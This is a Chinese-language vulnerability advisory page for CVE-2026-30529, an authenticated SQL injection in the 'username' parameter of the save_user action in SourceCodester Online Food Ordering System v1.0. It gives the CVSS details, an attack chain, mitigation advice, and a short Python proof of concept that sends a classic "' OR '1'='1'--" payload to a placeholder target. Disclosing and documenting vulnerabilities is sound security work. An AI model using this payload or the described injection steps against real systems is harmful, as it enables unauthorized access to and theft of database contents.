CVE-2026-30529 CVSS 8.8 高危

CVE-2026-30529 SourceCodester在线订餐系统SQL注入漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30529

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Online Food Ordering System

漏洞概述

SourceCodester在线订餐系统v1.0版本中存在严重的SQL注入漏洞。该漏洞位于Actions.php文件的save_user动作中，由于应用程序未能正确过滤用户提供的“username”参数，导致经过身份验证的攻击者可以注入恶意SQL语句。成功利用该漏洞可能导致数据库中的敏感信息泄露、数据被篡改或删除，严重威胁系统安全。

技术细节

该漏洞源于应用程序在处理用户注册或更新操作时，对“username”参数缺乏有效的输入验证和参数化查询保护。在Actions.php文件的save_user函数中，用户提交的username值被直接拼接到SQL查询语句中执行。攻击者可以通过构造包含特殊SQL字符（如单引号、注释符）的恶意payload，绕过简单的逻辑检查。由于CVSS向量显示PR:L（低权限），攻击者首先需要拥有一个普通用户账户。一旦通过认证，攻击者即可利用此漏洞执行任意SQL命令，例如通过UNION SELECT查询提取管理员密码哈希，或者利用基于布尔/时间的盲注技术获取数据库结构，进而获取服务器权限。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统为SourceCodester在线订餐系统v1.0

STEP 2

2. 获取低权限账户

攻击者在系统上注册一个普通用户账号，获取有效的Session ID

STEP 3

3. 构造攻击载荷

针对Actions.php的save_user接口，构造含有SQL语意的恶意username参数

STEP 4

4. 执行注入攻击

发送带有恶意载荷的HTTP请求，数据库执行注入的SQL命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL example
target_url = "http://target.com/Actions.php"

# Malicious payload for username parameter
payload = {
    "action": "save_user",
    "username": "admin' OR '1'='1'--", # SQL Injection payload
    "password": "test123"
}

# Cookies for authenticated session (Required as PR:L)
cookies = {
    "PHPSESSID": "authenticated_session_id_here"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("Request sent successfully.")
        print("Response:", response.text)
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

SourceCodester Online Food Ordering System 1.0

防御指南

临时缓解措施

在未修复前，建议在网络边界部署Web应用防火墙（WAF），启用SQL注入防护规则。同时，应严格限制数据库账户的访问权限，确保Web应用仅使用具备最小必要权限的数据库用户进行连接，防止敏感数据被批量导出。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表